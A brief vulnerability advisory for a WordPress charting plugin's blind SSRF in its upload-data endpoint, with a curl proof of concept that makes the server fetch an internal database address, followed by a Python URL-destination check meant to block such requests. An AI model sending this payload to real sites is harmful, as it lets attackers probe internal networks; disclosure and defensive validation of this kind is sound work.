This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
curl -i -s -X $'POST' \
    -H $'Host: 192.168.158.128:8000' \
    --data-binary $'{"url":"http://db:3306"}' \
    $'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data'

See the references for more details.
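A destination check that an endpoint fetching a caller-supplied `url` can run before making the request, shown as an added example that is not part of the advisory or the plugin's code. The function names, the port policy and the sample DNS data are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_PORTS = {"http": 80, "https": 443}  # assumed policy: default web ports only

# Constructed sample DNS data so the example runs offline (not from the advisory).
SAMPLE_DNS = {"db": ["172.18.0.2"], "charts.example.org": ["93.184.216.34"],
              "metadata.example.org": ["169.254.169.254"]}

def sample_resolver(host, port):
    return SAMPLE_DNS.get(host, [])

def system_resolver(host, port):
    try:
        infos = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    except OSError:
        return []
    return sorted({info[4][0] for info in infos})

def check_fetch_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a URL the server is asked to fetch."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a non-numeric or out-of-range port
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ALLOWED_PORTS:
        return False, "scheme not allowed"
    if not parts.hostname or parts.username or parts.password:
        return False, "missing host or embedded credentials"
    if port is not None and port != ALLOWED_PORTS[parts.scheme]:
        return False, "port not allowed"
    try:  # IP literals are checked directly, names go through the resolver
        addresses = [str(ipaddress.ip_address(parts.hostname))]
    except ValueError:
        addresses = resolver(parts.hostname, ALLOWED_PORTS[parts.scheme])
    if not addresses:
        return False, "host does not resolve"
    for addr in addresses:
        # One loopback, private, link-local or reserved record is enough to refuse.
        if not ipaddress.ip_address(addr.split("%")[0]).is_global:
            return False, "non-public address " + addr
    # Caveat: the fetch must connect to the addresses checked here, otherwise
    # a second DNS lookup can return a different (internal) answer.
    return True, "ok"

if __name__ == "__main__":
    for u in ("http://db:3306", "http://db/", "https://charts.example.org/data.csv"):
        print(u, check_fetch_url(u, sample_resolver))
```

Redirects need the same check on every hop, since a public URL that passes can still redirect the fetch to an internal address.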